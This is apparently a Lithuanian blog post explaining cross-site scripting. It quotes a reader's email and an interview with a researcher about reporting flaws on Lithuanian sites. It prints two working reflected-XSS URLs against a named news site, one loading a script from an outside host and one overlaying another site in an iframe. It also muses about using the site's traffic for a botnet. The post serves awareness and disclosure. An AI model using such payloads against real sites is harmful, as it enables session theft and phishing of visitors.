Kadangi senai rašiau apie web saugumą, apklausoje daugiausiai balsų kol kas renka praktinių pamokų noras, o dar ir į el. paštą atėjo su tuo susijęs laiškas, tad šiandien ir parašysiu apie šiuo metu populiariausią ir daug diskusijų keliantį tinklalapių pažeidžiamumą. Tas web pažeidžiamumų pirmūnas yra Cross Site Scripting, kuris trumpinamas tiesiog XSS. XSS, o ne CSS todėl, kad tiesiog nebūtų painiojama su Cascading Style Sheets. Pagal įvairius duomenis jis sutinkamas 75%-80% tinklalapių. Lietuviški nei kiek neatsilieka. Kaip pasireiškia tas pažeidžiamumas? Pažeidžiamumas yra nukreiptas ne prieš pačius tinklalapius, bet prieš jų vartotojus. Jei tinklalapyje yra palikta tokia skylė, tuomet jo lankytojui galima pakišti papildomą HTML kodą arba skriptą, kurį lankytojo naršyklė apdoros ir įvykdys kaip originalų. Ką su tuo galima padaryti? Kai tik toks pažeidžiamumas buvo atrastas, tuomet dažniausiai buvo tiesiog dedamas Java skriptas, kuris vykdydavo amžiną ciklą ir mesdavo lankytojams nesibaigiantį pranešimą. Žodžiu, toks “baeris”, kuris neduodavo normaliai naršyti. Vėliau sėkmingai buvo pradėtos klastoti tinklalapių dalys. Pvz. bankinėje sistemoje ant originalių prisijungimo laukelių uždėdavo niekuo nesiskiriančius padirbtus prisijungimo langelius, kurie tiesiog surinkdavo prisijungimo duomenis ir persiųsdavo nusikaltėliams. Vėliau, be puslapių klastojimo į darba stipriai buvo “pajungti” visokie skriptai, vykdomi naršyklėje. Dabar JavaScript’o pagalba vagiami duomenys, apeinant ugniasienę patikrinamas vidinio tinklo saugumas, išnaudojami įvairūs pažeidžiamumai (pvz. perkonfigūruojami vidiniai router’iai), perimamos naršymo sesijos, admino teisės, pavagimai ištisi blogai ir t.t. Žodžiu, galimybių daug. Jei koks nors programuotojas sako, kad čia š…, o ne pažeidžiamumas, tai sumažinkit jam algą (arba pasiūlykit tą padaryti jo šefui). Dvigubai. Kol netnaujins žinių. Jei toks programuotojas esi tu pats, tai skubėk pasitasyti, kol tavo šefas tau nesumažino algos. Dvigubai. O jei rimtai, tai šiandien, išnaudojantys XSS pažeidžiamumą, po internetą jau sklando virusai ir valdomi botnet’ai. Tiesa, botnet’e dalyvis aktyvus būna tol, kol veikia naršyklė. Ir jei neišnaudojami kiti naršyklės pažeidžiamumai ir nepavyksta įkišti į OS kokio papildomo malware’o, tai iš tokio botnet’o pasišalinama tiesiog uždarant naršyklę. Žodžiu, čia buvo šiek tiek teorijos. Dabar kaip visa tai atrodo gyvai. Štai čia ir pacituosiu prieš kurį laiką man atėjusį laišką (kalba netaisyta).

Sveiki,
Siunčiu informacijos, kuri gali pasirodys įdomi.
Galbūt teko girdėti apie tinklapį xssed.com. Taigi turiu surinkęs
keletą lietuviškų tinklapių su tapačiu pažeidimu.
http://www.xssed.com/archive/author=F3nix/
Yra ir info.lt, delfi.lt ir t.t.
Delfi.lt tiesiog stebina savo aplaidumu. XSS skylė vis dar neužtaisyta, nors nuo pranešimo administratoriam praėjo bemaž pusė metų.

http://www.delfi.lt/archive/article.php?id=1625&s2f=1&sendit=1&fromName=%3Cscript%20
src=http://lol.freehost.lt/1.js%3E%3C/script%3E

Taip. Xssed.com yra tinklalapis, kuriame gali registruoti surastus XSS pažeidžiamumus, už tai gauti taškus (kitą kartą papasakosiu kaip už tai gauti ne taškų, bet pinigų), užimti vietą reitingų lentelėje ir t.t. Pasirodo ten sėkmingai dalyvauja ir lietuvis F3nix. Sistemų priregistravęs daug ir visokių. Vienos jau susitvarkiusios, kitos dar ne. Tarp pastarųjų yra ir delfi.lt. Jis ir pateikia pačio paprasčiausio XSS pažeidžiamumo išnaudojimo pavyzdį. Tiesiog įvykdomas JavaScript’as, kuris lankytojui parodo pranešimą. Galim pasilinksminti ir labiau nedarydami nieko blogo. Pvz. priverskim delfi.lt rodyti alfa.lt turinį:

http://www.delfi.lt/archive/article.php?id=1625&s2f=1&sendit=1&fromName=%3Cscript%3E
document.writeln(’%3Ciframe%20style=%22position:absolute;%20top:%20150px;%20left:0px;%22%20
frameborder=0%20height=1500px%20width=100%%20src=http://www.alfa.lt/%3E’);%3C/script%3E

O jei taip botnet’ą? Su delfi lankomumu jis turėtų gautis nemažas. Gerai, kad to dar niekas nesugalvojo padaryti (o gal jau?). Manau programuotojai greitai pagavo kampą kas ir kodėl čia įvyksta. Taigi, šis pažeidžiamumas dažnas klaidų ir paieškos puslapiuose. Pavaikščioję po F3nix surinktą katalogą būtent tai ir pamatysit. Jo kataloge taip pat pilna iš esmės tik vieno tipo XSS pažeidžiamumų, t.y. vaizduojamojo. Be vaizduojamojo dar būna išsaugomasis (kai nereikia vartotojo priversti kažką spausti) ir DOM (išnaudojantis išskirtinai JavaScript trūkumus). Bet į tai daugiau nesigilinsiu, nes principą jau turėjote suprasti, beliko detalės.

Tuo tarpu aš nusprendžiau pakalbinti patį F3nix. Paprašiau tiesiog trumpai jo papasakoti apie save. Atsakymą gavau tokį (kalba netaisyta):

Na tai trumpai ir parašysiu, nes nesinori per daug lyst viešumon.
Esu 19 metų, ir jau tris metus aktyviai kovoju už vartotojų saugumą.
XSS pažeidiamumai, matyt, paprasčiausi, todėl juos galima viešinti,
nes paviešinus kokį SQL, turbūt tą pačia dieną atsirastų įsilauželis
besinaudojantis kitų surastomis spragomis.
Dėl XSS tipo pažeidžiamumų per nelyg galvos nesuku ir pranešu
administratoriams tik jei tipiškas pažeidžiamumas pasikartoja visoje
sistemoje ar aukštus reitingus turinčiame puslapyje (delfi, info,
sonex ir t.t).
Radęs SQL pažeidžiamumus, nedelsiant informuoju adminstratorius, ir
labai sveikintina, kad daugelis iš jų sureaguoja tą pačia dieną. Kai
pavyzdį pateiksiu rem.lt, kurie dar ir labai gražiai padėkojo.
Lietuviškų tinklapių saugumas iš tiesų pasibaisėtinas. Žvilgterkim į
ieškok.lt, pasinaudojus cookie pakeitimu buvo galima prisijungti bet
kuriuo kitu vartotoju. Neilgai trukus puslapis buvo atnaujintas, bet
paliekant dar baisesnė klaidą - laisvą priėjimą prie visų vartotojų
duomenų bazės.
Nieko stebėtino, netgi valstybiniuose puslapiuose saugumo klaidų apstu.
Ir galiausiai, gal galėtum mestelt sakinį su mano email, kad už tam
tikrą užmokestį analizuoju tinklapius ir ieškau pažeidžiamumų.

O beje, nepaminėjau www.e*******y.lt. Ponai labai save reklamuoja, bet
iš didelio rašto išėjo iš krašto. Jų ženkliuku pažymėti tinklapiai,
neva saugūs, yra skylėti kaip rėčiai…. Labai panašu į neseniai
nuaidėjusį HackerSafe skandalą.

Nuo savęs galiu tik pridėti, kad jam apie surastus pažeidžiamumus sekasi informuoti geriau nei man. Jo rastus, lengviau išnaudojamus pažeidžiamumus, bent jau susitvarko greičiau. Aš kol kas geriausiu atveju gaudavau tik “ačiū” arba nieko ir labai gerai jei kas nors po to pasikeisdavo. Kažkaip man dažnesnis būdavo delfi.lt atvejis, kai niekas nereaguodavo bent pusę metų. Matau, kad pasikeitmai vyksta ir šioje srityje. Programuojantys, tikiuosi, suskubs tvarkyti savo sistemų, nes kaip patys matot, klaida populiari ir ne visuomet paprastai aptinkama. O daro ją visi kas netingi. Tie kas tingi irgi. Dvigubai daugiau.

» Temos: Apie viską, Blogietis
» Žymėtis: kaip.tik.ten :: topix.lt :: del.icio.us

Įrašo gairės: html javascript xss